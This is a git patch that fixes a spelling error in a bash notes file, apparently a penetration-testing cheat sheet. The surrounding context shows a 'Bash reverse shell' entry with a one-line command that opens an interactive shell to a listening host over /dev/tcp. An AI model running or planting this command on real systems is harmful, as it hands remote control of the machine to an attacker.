From 726f60ce32113fdc074e91881d9e506b8a38763a Mon Sep 17 00:00:00 2001 From: David Busby Date: Sat, 7 Jun 2014 12:00:10 +0100 Subject: [PATCH] typo correction --- scripting/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 21b0e41..d4276fb 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -115,7 +115,7 @@ cat /proc/cpuinfo **Bash reverse shell** (@icleus) -Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. +Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &